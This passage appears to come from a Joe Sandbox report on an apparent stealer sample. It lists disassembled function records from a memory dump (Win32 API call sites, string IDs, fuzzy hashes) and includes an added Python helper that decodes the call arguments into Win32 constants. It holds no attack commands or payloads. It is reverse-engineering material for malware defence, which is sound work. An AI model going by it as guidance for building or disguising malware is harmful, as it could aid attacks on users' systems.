                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                                                        • Opcode ID: f3ec2adfa556d2e801977b4fecdc85d96d666de85f37e6ebff7e60f19d49b0d2
                                                                                                                                                                        • Instruction ID: 7534737adef7a3d12903085f777155134dc505d82ba9bd3c5ec34cc9a0d89cb3
                                                                                                                                                                        • Opcode Fuzzy Hash: f3ec2adfa556d2e801977b4fecdc85d96d666de85f37e6ebff7e60f19d49b0d2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1B1299756242019FDB14EF15C881A2AB7E5FF88714F14889DF99A9B3A2CB31EC51CF81
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002F1462
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F149D
                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F14F0
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F1526
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F15A2
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F161D
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                          • Part of subcall function 002C3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002C3547
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                                                        • Opcode ID: 6fc4b700cfdd7932eee2c6feaaaaa32024ce5171c52ab378b5cef8714d0103ba
                                                                                                                                                                        • Instruction ID: 6a7990e0d48b6063cf612d85562429fad73ac6121bf64d3f7846be9e36f955a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc4b700cfdd7932eee2c6feaaaaa32024ce5171c52ab378b5cef8714d0103ba
                                                                                                                                                                        • Instruction Fuzzy Hash: CDE1CD35628206CFC714EF24C55082AF7E6BF94394B84896CF9969B3A1DB30ED65CF81
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                        • Opcode ID: 7b5f06b0a7438a85ec07e317f0fcbd6c85c462e368cba3c30bb80ca82c95f4ef
                                                                                                                                                                        • Instruction ID: e2f0582a7df8cf970578145074af5f52d14571907a3845f4c9ddbb8ef15089cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5f06b0a7438a85ec07e317f0fcbd6c85c462e368cba3c30bb80ca82c95f4ef
                                                                                                                                                                        • Instruction Fuzzy Hash: F97117366B01A78BCB10AF3ED9506BB33A5AF70354BE10125F8569B294EA31DD74C790
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DB5
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DC9
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DEC
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8E0F
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002F8E4D
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002F6691), ref: 002F8EA9
                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002F8EE2
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002F8F25
                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002F8F5C
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 002F8F68
                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002F8F78
                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,002F6691), ref: 002F8F87
                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002F8FA4
                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002F8FB0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                        • Opcode ID: 6580fb1098e41791ec89efdba1d62c4702c9424584f6993cc5c0c73643efe031
                                                                                                                                                                        • Instruction ID: f0dd5f4a715223fa586236b18cc992c258a4946640fb8687127d428dbd1f7859
                                                                                                                                                                        • Opcode Fuzzy Hash: 6580fb1098e41791ec89efdba1d62c4702c9424584f6993cc5c0c73643efe031
                                                                                                                                                                        • Instruction Fuzzy Hash: 5761F47152021ABFEB14DF64DC45BBEF7A8BF08B60F104226F915D61D1DB74A9A0CBA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 002D493D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4948
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D499F
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D49DD
                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 002D4A1B
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4A63
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4A9E
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4ACC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                        • Opcode ID: 5fabc9727d399a5b437628273954aebe6ba44a136b8c89ca2077cbfe09468ba8
                                                                                                                                                                        • Instruction ID: 4dfb501ad853c23c2d2e9fc05a698e9ef5bdfb8311ab9258e06a818125d273b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fabc9727d399a5b437628273954aebe6ba44a136b8c89ca2077cbfe09468ba8
                                                                                                                                                                        • Instruction Fuzzy Hash: ED71D0325282128FC710EF34D89096AB7E4FF58768F10492EF89697361EB31DD95CB81
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 002C6395
                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002C63A7
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 002C63BE
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002C63D3
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002C63D9
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002C63E9
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002C63EF
                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002C6410
                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002C642A
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002C6433
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C649A
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 002C64D6
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002C64DC
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002C64E3
                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002C653A
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 002C6547
                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 002C656C
                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002C6596
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                        • Opcode ID: f614f63a43053796f453ae23dd4659df4c16a57662c29953357707aca044a22a
                                                                                                                                                                        • Instruction ID: 8e5265f2e500ddf045da7a1aa73abefa1f802e9e04b9998a30a152eaddb8841e
                                                                                                                                                                        • Opcode Fuzzy Hash: f614f63a43053796f453ae23dd4659df4c16a57662c29953357707aca044a22a
                                                                                                                                                                        • Instruction Fuzzy Hash: D6718C31900606AFDB20DFA8DE49FAEBBF5FF48744F10062CE186A25A0D775E954CB50
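The function records above list call sites with raw hexadecimal arguments (SendMessageW with 0x1105 and 0x110A, SendDlgItemMessageW with 0xC5 and 0xCC, LoadLibraryExW with flags 0x32, LoadImageW with 0x2010) and virtual addresses that only make sense against the dump's image base of 0x260000. The helper below is an added example written for this page, not code from the Joe Sandbox report or its IDA plugin. It parses the "APIs" lines in the format shown in the records, resolves the message, cursor and flag constants from a hand-picked subset of winuser.h / libloaderapi.h values, and rebases each call site to an RVA so it can be found in a disassembly of the unpacked module regardless of where it was loaded. SAMPLE is constructed from lines in the records above; the helper names and the constant subset are the editor's choices and cover only what these records use. One practical reading the decoding gives: the LoadLibraryExW call maps the target with LOAD_LIBRARY_AS_DATAFILE and LOAD_LIBRARY_AS_IMAGE_RESOURCE, so no DllMain runs and that routine is icon extraction rather than code loading, and the TVM_*/EM_* messages are ordinary GUI-control manipulation. (The vocabulary in the preceding records, tree-view verbs such as GETITEMCOUNT and GETSELECTED, registry hive aliases, and the "set cd door open" mci strings, matches the built-in command set of the AutoIt3 runtime; that is an inference from the strings, not a statement the report makes, and the records at this point should be read as interpreter support code rather than the stealer logic itself.)

```python
"""Decode the numeric Win32 arguments in Joe Sandbox 'APIs' lines.

Added example: this is the editor's own helper, not code from the report or
from Joe Sandbox. SAMPLE is constructed from call-site lines in the records
above; IMAGE_BASE is the 'Offset:' of the dump they come from.
"""
import re
from dataclasses import dataclass

IMAGE_BASE = 0x260000  # "Offset: 00260000, based on PE: true" in the records

# Subset of Win32 constants needed for the records above (winuser.h / libloaderapi.h values).
MESSAGES = {
    0x0005: "WM_SIZE", 0x0080: "WM_SETICON", 0x00C5: "EM_LIMITTEXT",
    0x00CC: "EM_SETPASSWORDCHAR", 0x0170: "STM_SETICON",
    0x1105: "TVM_GETCOUNT", 0x110A: "TVM_GETNEXTITEM",
}
TVGN = {0x9: "TVGN_CARET"}  # wParam of TVM_GETNEXTITEM: the selected item
CURSORS = {
    0x7F00: "IDC_ARROW", 0x7F01: "IDC_IBEAM", 0x7F03: "IDC_CROSS",
    0x7F80: "IDC_SIZE", 0x7F81: "IDC_ICON", 0x7F88: "IDC_NO",
    0x7F89: "IDC_HAND", 0x7F8A: "IDC_APPSTARTING", 0x7F8B: "IDC_HELP",
}
LOADLIBRARY_FLAGS = {
    0x01: "DONT_RESOLVE_DLL_REFERENCES", 0x02: "LOAD_LIBRARY_AS_DATAFILE",
    0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL", 0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
}
LOADIMAGE_FLAGS = {0x10: "LR_LOADFROMFILE", 0x2000: "LR_CREATEDIBSECTION", 0x8000: "LR_SHARED"}

# "<api>.<module>(<hex args>), ref: <hex va>"; the argument list and the comma are optional
LINE_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,? ref: ([0-9A-Fa-f]+)")


@dataclass
class ApiRef:
    api: str
    module: str
    args: list       # int per resolved argument, None where the report shows '?'
    ref: int         # virtual address of the call site as dumped
    subcall: bool    # True for "Part of subcall function ..." lines

    @property
    def rva(self):
        return self.ref - IMAGE_BASE


def parse_api_line(line):
    """Parse one 'APIs' bullet; returns None for lines that are not call sites."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = []
    if raw_args:
        for a in raw_args.split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return ApiRef(api, module, args, int(ref, 16), "subcall" in line)


def decode_flags(value, table):
    """Render a bit mask as 'A|B|...'; unknown bits are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def annotate(ref):
    """Return a short human-readable note for one call site ('' if nothing to decode)."""
    def arg(i):
        return ref.args[i] if i < len(ref.args) else None
    if ref.api in ("SendMessageW", "PostMessageW") and arg(1) is not None:
        note = MESSAGES.get(arg(1), f"msg 0x{arg(1):04X}")
        if arg(1) == 0x110A and arg(2) in TVGN:
            note += " " + TVGN[arg(2)]
        return note
    if ref.api == "SendDlgItemMessageW" and arg(2) is not None:
        return f"ctrl {arg(1)}: " + MESSAGES.get(arg(2), f"msg 0x{arg(2):04X}")
    if ref.api == "LoadCursorW" and arg(1) is not None:
        return CURSORS.get(arg(1), f"cursor 0x{arg(1):04X}")
    if ref.api == "LoadLibraryExW" and arg(2) is not None:
        return decode_flags(arg(2), LOADLIBRARY_FLAGS)
    if ref.api == "LoadImageW":
        parts = ["IMAGE_ICON"] if arg(2) == 1 else []
        if arg(5) is not None:
            parts.append(decode_flags(arg(5), LOADIMAGE_FLAGS))
        return " ".join(parts)
    return ""


def annotate_record(text):
    """Parse every call-site line in a record; returns (rva, api, note) tuples."""
    out = []
    for line in text.splitlines():
        ref = parse_api_line(line)
        if ref is not None:
            out.append((ref.rva, ref.api, annotate(ref)))
    return out


# Constructed sample: lines copied from the function records on this page.
SAMPLE = """\
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F14F0
  • Part of subcall function 002C3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002C3547
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002F6691), ref: 002F8EA9
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002F8E4D
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002C6410
• GetDesktopWindow.USER32 ref: 002C64DC
• LoadCursorW.USER32(00000000,00007F89), ref: 002E0884
"""

if __name__ == "__main__":
    for rva, api, note in annotate_record(SAMPLE):
        print(f"RVA 0x{rva:06X}  {api:<20} {note}")
```

Paste a record's "APIs" bullets into SAMPLE (or feed a saved report section to annotate_record) and extend the constant tables as other records need them; the RVA column is what to search for after loading the 0000000B.00000002.2323498910 dump, rebased to its "Offset", in a disassembler.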
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 002E0884
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 002E088F
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002E089A
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 002E08A5
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 002E08B0
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 002E08BB
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 002E08C6
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 002E08D1
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 002E08DC
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 002E08E7
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 002E08F2
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 002E08FD
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 002E0908
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 002E0913
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 002E091E
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 002E0929
                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 002E0939
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002E097B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                        • Opcode ID: 8641780a756a573d15320f528216bb270de3d19cf6906de5fc5a99ddff4a9387
                                                                                                                                                                        • Instruction ID: d86b87c50cb3da6f535e7bd0641e34835ca14eb3987e6463b42f0d44c0d241cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 8641780a756a573d15320f528216bb270de3d19cf6906de5fc5a99ddff4a9387
                                                                                                                                                                        • Instruction Fuzzy Hash: 63415470D4835A6ADB109FBA8CC986EBFE8FF04754B50452AE11CE7282DB789841CF91
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k2
                                                                                                                                                                        • API String ID: 176396367-4155453453
                                                                                                                                                                        • Opcode ID: 349a8ebb5fd4279394e009bfc65a3f7d521bee15e6c107463af6207756e3fd60
                                                                                                                                                                        • Instruction ID: 322cdc263a988cda31560ea7aac8c9183968faf2629991f56c2dd0fc823a545f
                                                                                                                                                                        • Opcode Fuzzy Hash: 349a8ebb5fd4279394e009bfc65a3f7d521bee15e6c107463af6207756e3fd60
                                                                                                                                                                        • Instruction Fuzzy Hash: F3E1C532A205269BCB14DFB4C851BEDFBB5BF14710F10CA1EE456E7250DB30AEA59B90
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 002F9BA3
                                                                                                                                                                          • Part of subcall function 002F80AE: ClientToScreen.USER32(?,?), ref: 002F80D4
                                                                                                                                                                          • Part of subcall function 002F80AE: GetWindowRect.USER32(?,?), ref: 002F814A
                                                                                                                                                                          • Part of subcall function 002F80AE: PtInRect.USER32(?,?,?), ref: 002F815A
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002F9C0C
                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002F9C17
                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002F9C3A
                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002F9C81
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002F9C9A
                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 002F9CB1
                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 002F9CD3
                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 002F9CDA
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 002F9DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(3$(3
                                                                                                                                                                        • API String ID: 221274066-3044128499
                                                                                                                                                                        • Opcode ID: 80f674eebe072765f717259ab89ab837cbc8a021787948d1153b41636e5da709
                                                                                                                                                                        • Instruction ID: e73e5969504d40bd924b48c957781431c831c3922a85a68d554550da97ef8318
                                                                                                                                                                        • Opcode Fuzzy Hash: 80f674eebe072765f717259ab89ab837cbc8a021787948d1153b41636e5da709
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B619C71518305AFC302EF50DC85EAFFBE9EF88750F00092DF691961A1DB309699CB52
                                                                                                                                                                        APIs
                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00280436
                                                                                                                                                                          • Part of subcall function 0028045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0033170C,00000FA0,955C87BD,?,?,?,?,002A2733,000000FF), ref: 0028048C
                                                                                                                                                                          • Part of subcall function 0028045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002A2733,000000FF), ref: 00280497
                                                                                                                                                                          • Part of subcall function 0028045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002A2733,000000FF), ref: 002804A8
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002804BE
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002804CC
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002804DA
                                                                                                                                                                          • Part of subcall function 0028045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00280505
                                                                                                                                                                          • Part of subcall function 0028045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00280510
                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00280457
